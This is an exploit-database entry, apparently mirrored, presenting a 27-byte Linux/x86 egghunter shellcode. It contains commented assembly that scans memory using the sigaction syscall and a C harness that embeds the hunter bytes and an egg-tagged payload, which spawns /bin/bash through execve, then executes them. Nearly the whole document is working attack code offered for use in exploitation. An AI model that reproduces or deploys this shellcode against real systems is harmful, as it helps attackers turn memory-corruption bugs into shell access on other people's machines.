Linux/x86 - Egghunter (0x50905090) + sigaction() Shellcode (27 bytes)



EKU-ID: 7989 CVE: OSVDB-ID:
Author: Valerio Brussani Published: 2018-09-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
# Title: Linux/x86 - Egghunter + sigaction-based Shellcode (27 bytes)
# Author:Valbrux
# Date: 2018-09-19
# This exploit is a dirty-slow but small version of the sigaction-based egg hunter shellcode
 
global _start
 
section .text
 
;zeroing ecx
xor ecx,ecx
 
_start:
    ;increment
    inc ecx
    ;sigaction syscall number
    push byte 67
    pop eax
    ;executing syscall
    int 0x80
    ;if EFAULT
    cmp al,0xf2
    ;page alignment
    jz _start
    ;moving EGG
    mov eax,0x50905090
    ;current address
    mov edi,ecx
    ;checking current address with EGG two times
    scasd
    jnz _start
    scasd
    jnz _start
    ;if equals jump to shellcode
    jmp edi
 
*/
 
#include <stdio.h>
#include <string.h>
#define EGG "\x90\x50\x90\x50"
 
unsigned char code[] = EGG EGG"\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
 
//27 Bytes
unsigned char egg[] = "\x31\xc9\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf6\xb8"EGG"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
 
main()
{
    printf("Egg length: %d\n",strlen(egg));
    printf("Shellcode lenght: %d\n",strlen(code));
    int (*ret)() = (int(*)())egg;
    ret();
 
}